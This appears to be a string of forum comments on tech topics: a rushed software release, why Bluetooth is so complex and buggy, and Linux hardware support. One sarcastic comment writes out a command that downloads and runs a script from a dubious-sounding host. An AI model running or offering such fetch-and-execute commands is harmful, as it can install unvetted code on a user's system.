This should have been much more well thought out The wording, image, buttons, specific wording for each page.
They really screwed the pooch.
Another 4-6 months minimum before release. But quarterly numbers must be met.
This should have been much more well thought out The wording, image, buttons, specific wording for each page.
They really screwed the pooch.
Another 4-6 months minimum before release. But quarterly numbers must be met.
wget toteslegitdebian.app/installer.sh & chmod +x && ./installer.sh
was I not supposed to do that? but staxoverflown said it’s OK.
That does go a long way towards explaining why there are so many Bluetooth vulnerabilities, thanks for the info. Looking at the list of Bluetooth protocols wiki page gives me a headache. Surely there is a better standard, and I see things like HaLow, ZigBee, Z-Wave and other custom protocols, but it seems like there should be a very cleanly well-documented alternative to do the basics that everyone expects BT to do. This, coming from a total noob, speaking completely out of my anus. I just know that as a BT user, it’s a crapshoot whether there will be major audio delay, and pause/play actually worked, that’s if pairing works in the first place. But if something did come along I wonder if there would even be adoption among consumer devices.
Is it true the Bluetooth network stack is larger than the WiFi network stack? If so, why? I don’t know much about BT besides pairing, allowing calls and audio in/out, transferring files, and… is there more? It takes a day of reading documentation to understand all the advanced options on my ASUS router interface, and that’s without anything proprietary.
I’m just surprised and curious and never got a satisfying answer.
Honeypot? Dunno. Good discussions about it on hacker news.
I’m uh, I’m a rascal, you can derascalize me.
I assume the problem is hardware. Matt’s hardware didn’t work well with LM, therefore Matt thinks LM sucks… I do wish there was better hardware support but it’s the reason apple went with 1 product = 1 OS = 1 general set of hardware. Sure not every iPhone has the same hardware, but that’s why they have the model numbers, and it’s so much easier to test 200 model mixes than 2,000,000 (Android). Windows gets all the debug info sent directly to them like the others but they also have a huge stack of hardware they can use or they can buy it to test.